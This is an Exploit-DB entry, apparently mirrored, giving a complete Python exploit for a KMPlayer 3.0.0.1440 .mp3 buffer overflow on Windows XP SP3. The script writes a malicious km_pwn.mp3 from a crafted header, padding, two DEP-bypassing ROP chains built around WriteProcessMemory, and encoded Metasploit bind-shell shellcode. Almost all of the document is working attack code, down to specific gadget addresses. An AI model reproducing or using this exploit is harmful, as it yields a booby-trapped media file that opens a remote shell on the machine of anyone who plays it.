The KMPlayer 3.0.0.1440 (Windows XP SP3) – ‘.mp3’ File Buffer Overflow (DEP Bypass)

• Exploit Database
• 120 阅读

• 作者： dookie & ronin
  日期： 2011-06-06
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17364/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240

  #!/usr/bin/python # # The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass # # Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html # # 06 Jun 11 # # Cobbled together by dookie and ronin # # This exploit performs DEP bypass on WinXP SP3 with 2 different offsets. # In our testing environments, there were 2 separate offsets. One offset # applies to VMs running on Xen and VMware workstation for Linux. The # second offset applies to ESXi and VMware Fusion.   import os   evilfile = "km_pwn.mp3"   head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"   cruft = "\x85" * 3162 nops = "\x90" * 28 nops += "\x91\x90\x90\x90" # The last byte gets decremented in rop2 while pointing EAX at the shellcode nops += "\x90" * 20   #shellcode = "\xcc" * 368 # Size of bind shell   #root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)   shellcode = ("\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" "\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xc0\x3a\x89\x2c\x36\x33" "\x72\xcd\xc6\x24\xfa\x28\xf7\x76\x98\x39\xa5\x46\xea\x6c\x45" "\x2c\xbe\x84\xde\x40\x17\xaa\x57\xee\x41\x85\x68\xde\x4d\x49" "\xaa\x40\x32\x90\xfe\xa2\x0b\x5b\xf3\xa3\x4c\x86\xfb\xf6\x05" "\xcc\xa9\xe6\x22\x90\x71\x06\xe5\x9e\xc9\x70\x80\x61\xbd\xca" "\x8b\xb1\x6d\x40\xc3\x29\x06\x0e\xf4\x48\xcb\x4c\xc8\x03\x60" "\xa6\xba\x95\xa0\xf6\x43\xa4\x8c\x55\x7a\x08\x01\xa7\xba\xaf" "\xf9\xd2\xb0\xd3\x84\xe4\x02\xa9\x52\x60\x97\x09\x11\xd2\x73" "\xab\xf6\x85\xf0\xa7\xb3\xc2\x5f\xa4\x42\x06\xd4\xd0\xcf\xa9" "\x3b\x51\x8b\x8d\x9f\x39\x48\xaf\x86\xe7\x3f\xd0\xd9\x40\xe0" "\x74\x91\x63\xf5\x0f\xf8\xeb\x3a\x22\x03\xec\x54\x35\x70\xde" "\xfb\xed\x1e\x52\x74\x28\xd8\x95\xaf\x8c\x76\x68\x4f\xed\x5f" "\xaf\x1b\xbd\xf7\x06\x23\x56\x08\xa6\xf6\xf9\x58\x08\xa8\xb9" "\x08\xe8\x18\x52\x43\xe7\x47\x42\x6c\x2d\xfe\x44\xa2\x15\x53" "\x23\xc7\xa9\x42\xef\x4e\x4f\x0e\x1f\x07\xc7\xa6\xdd\x7c\xd0" "\x51\x1d\x57\x4c\xca\x89\xef\x9a\xcc\xb6\xef\x88\x7f\x1a\x47" "\x5b\x0b\x70\x5c\x7a\x0c\x5d\xf4\xf5\x35\x36\x8e\x6b\xf4\xa6" "\x8f\xa1\x6e\x4a\x1d\x2e\x6e\x05\x3e\xf9\x39\x42\xf0\xf0\xaf" "\x7e\xab\xaa\xcd\x82\x2d\x94\x55\x59\x8e\x1b\x54\x2c\xaa\x3f" "\x46\xe8\x33\x04\x32\xa4\x65\xd2\xec\x02\xdc\x94\x46\xdd\xb3" "\x7e\x0e\x98\xff\x40\x48\xa5\xd5\x36\xb4\x14\x80\x0e\xcb\x99" "\x44\x87\xb4\xc7\xf4\x68\x6f\x4c\x04\x23\x2d\xe5\x8d\xea\xa4" "\xb7\xd3\x0c\x13\xfb\xed\x8e\x91\x84\x09\x8e\xd0\x81\x56\x08" "\x09\xf8\xc7\xfd\x2d\xaf\xe8\xd7")   ##################### ROP Chain for VMware Workstation (Linux) and Xen #####################   eip = "\x71\x14\x40\x00" # 00401471 RETN Pivot to the stack toesp = "\x42" * 4 wpm = "\x13\x22\x80\x7c" # 7C802213 WriteProcessMemory - XPSP3 wpm += "\x20\x1f\x45\x02" # 02451F20 in_wm.dll - Return after WPM wpm += "\xff\xff\xff\xff" # hProcess wpm += "\x10\x1f\x45\x02" # 02451F10 in_wm.dll - Address to Patch wpm += "\xbe\xba\xfe\xca" # lpBuffer placeholder (Shellcode Address) wpm += "\xce\xfa\xed\xfe" # nSize placeholder (Shellcode Size) wpm += "\xc0\x2b\x45\x02" # 02452BC0 in_wm.dll - Pointer for Written Bytes   # Get a copy of ESP into a register rop1 = "\x4f\x92\x71\x13" # 1371924F :{POP}# PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll) rop1 += "\x41" * 12 # Junk to be popped into ESI, EBP, and EBX junk = "\x61" * 52 # Junk in between our VirtualProtect parameters and the next ROP chain   # Put a copy of the saved ESP from EDI into EAX rop2 = "\x75\x66\x8a\x5b" # 5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll) rop2 += "\x41" * 8 # Compensate for the RETN 8 in rop1 # Increase EAX to point at our shellcode rop2 += "\x37\x75\x37\x02" # 02377537 :# ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll) rop2 += "\x37\x75\x37\x02" # 02377537 :# ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)   # Write the address of the shellcode into the lpBuffer placeholder # First need to put EAX in a safe spot then juggle around EDI to get it to ESI rop2 += "\xc3\x87\xec\x76" # 76EC87C3 :# XCHG EAX,EDX # RETN (TAPI32.dll) rop2 += "\x75\x66\x8a\x5b" # 5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll) rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 :# XCHG EAX,ESI # RETN (comdlg32.dll) rop2 += "\xc3\x87\xec\x76" # 76EC87C3 :# XCHG EAX,EDX # RETN (TAPI32.dll) rop2 += "\xbe\x9c\xca\x76" # 76CA9CBE :# MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll) rop2 += "\x41" * 4 # Junk to be popped into ESI   # Get the intial ESP value back into ESI rop2 += "\xe6\x57\x01\x15" #150157E6 :{POP}# DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll) rop2 += "\x41" * 8 # Junk to be popped into EBX and ECX   # Get the initial ESP value back into ESI rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 :# XCHG EAX,ESI # RETN (comdlg32.dll)   # Zero EAX and set it to the shellcode size (0x200) rop2 += "\xc0\x11\x37\x02" # 023711C0 :# XOR EAX,EAX # RETN (in_mp4.dll) rop2 += "\xe9\x0b\x44\x02" # 02440BE9 :# ADD EAX,100 # POP EBP # RETN (in_wm.dll) rop2 += "\x41" * 4 # Junk to be popped into EBP rop2 += "\xe9\x0b\x44\x02" # 02440BE9 :# ADD EAX,100 # POP EBP # RETN (in_wm.dll) rop2 += "\x41" * 4 # Junk to be popped into EBP   # Write the shellcode size into the nSize placeholder rop2 += "\x3f\xcf\x9e\x7c" # 7C9ECF3F :{POP}# MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll) rop2 += "\x41" * 8 # Junk to be popped into ESI and EBP   # Point EAX to the WPM setup on the stack, push EAX and POP it into ESP rop2 += "\x41\x15\x5d\x77" # 775D1541 :# SUB EAX,4 # RETN (ole32.dll) rop2 += "\x41" * 4 rop2 += "\x51\xeb\x43\x02" # 0243EB51 :# ADD EAX,0C # RETN (in_wm.dll) rop2 += "\xce\x05\x42\x02" # 024205CE :{POP}# PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll) rop2 += "\x41" * 4 # Junk to be popped into ESI   rop2 += "\x41" * 32   ############################# ROP Chain for VMware Fusion and ESXi ############################   ############################################################################################### ## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction ############################################################################################### #put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee jmp_value = "\xf0\x38\x00\x00" rop_1 = "\x46"*4 #0x7744802C :# INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)** rop_1 += "\x2c\x80\x44\x77" #0x5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)** rop_1 += "\x75\x66\x8a\x5b" #0x7C926021 :{POP}# SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll)** rop_1 += "\x21\x60\x92\x7c" rop_1 += "\x50" * 8 #0x7E451509 :# XCHG EAX,ESP # RETN (USER32.dll)** rop_1 += "\x09\x15\x45\x7e" ###############################################################################################     filler_a1 = "\x41"*360     ############################################################################################### ## ROP_2 = all about the shell ###############################################################################################   ######### SAVING STACKPOINTERS ################################################################ #0x7744802C :# INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)** rop_2 = "\x2c\x80\x44\x77" #0x5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)** rop_2 += "\x75\x66\x8a\x5b" #0x5B8A9F1E :# ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll)** rop_2 += "\x1e\x9f\x8a\x5b" rop_2 += "\x43\x43\x43\x43"   #WriteProcessMemory construct with the two placeholders we need to generate on the fly ############################################################################################### rop_2 += "\x13\x22\x80\x7c" #WriteProcMem - XPSP3 rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target rop_2 += "\xff\xff\xff\xff" #hProcess rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target rop_2 += "\xbe\xba\xfe\xca" #lpBuffer placeholder (Shellcode Address) rop_2 += "\xce\xfa\xed\xfe" #lpBuffer placeholder (Shellcode Size) rop_2 += "\10\x20\x98\x7c"#writeable location in ntdll ###############################################################################################   ######### FIRST PARAM - lpBuffer placeholder (Shellcode Address)############################### #gadgets (plus various paddings) used to construct the memory address which will point to our shellcode #then we write the value to the correct memory address and restore EAX rop_2 += "\x44" * 40 #0x7C974E8E :# ADD EAX,100 # POP EBP # RETN(ntdll.dll)** rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x44" *32 rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x44"*4 #0x7E45DA8D :# XCHG EAX,EBP # RETN (USER32.dll)** rop_2 += "\x8d\xda\x45\x7e" #0x77DD994E :# XCHG EAX,EDI # RETN 2 (ADVAPI32.dll)** rop_2 += "\x4e\x99\xdd\x77" #0x7C910C66 :# XCHG EAX,ESI # RETN 2 (ntdll.dll)** rop_2 += "\x66\x0c\x91\x7c" #padding rop_2 += "\x44" * 2 #0x7E45DA8D :# XCHG EAX,EBP # RETN (USER32.dll)** rop_2 += "\x8d\xda\x45\x7e" #padding rop_2 += "\x44"*2 #0x76CA9CBE :# MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN(IMAGEHLP.dll)** rop_2 += "\xbe\x9c\xca\x76" ###############################################################################################     ######### SIZE PARAM - lpBuffer placeholder (Shellcode Size) ################################## #gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes) #then we write the value to the correct memory address and restore EAX rop_2 += "\x47" *4 #0x775D156E :# PUSH EAX # POP ESI # RETN (ole32.dll)** rop_2 += "\x6e\x15\x5d\x77" #0x7E433785 :# XOR EAX,EAX # RETN 4(USER32.dll)** rop_2 += "\x85\x37\x43\x7e" #0x7C974E8E :# ADD EAX,100 # POP EBP # RETN(ntdll.dll)** rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x45"*8 rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x45"*4 #0x75D0AA2E :# MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN(mlang.dll)** rop_2 += "\x2e\xaa\xd0\x75" ###############################################################################################   ############################################################################################### ######### Realigning EAX to point to WPM and setting ESP to it ################################ rop_2 += "\x50" * 4 #0x76CAF118 :# ADD EAX,0C # RETN (IMAGEHLP.dll)** rop_2 += "\x18\xf1\xca\x76" #0x7E451509 :# XCHG EAX,ESP # RETN (USER32.dll)** rop_2 += "\x09\x15\x45\x7e" rop_2 += "\x43"*316 ###############################################################################################   ##################### VARIOUS PADDINGS AND OTHER NONSENSE ##################################### #slide into the shell nops_7 = "\x90"*56 #after the shell junk filler_a2 = "\x42" * (3200) ###############################################################################################   ############################# PUTTING IT TOGETHER ############################################# filler_a = filler_a1 + rop_2 + nops_7 +shellcode +filler_a2 #small buffer filler filler_b = "\x44" * (95) #the whole shebang (ronin's version) filler = filler_a+jmp_value+eip+rop_1+filler_b ###############################################################################################       sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler   crashy = open(evilfile,"w") crashy.write(sploit) crashy.close()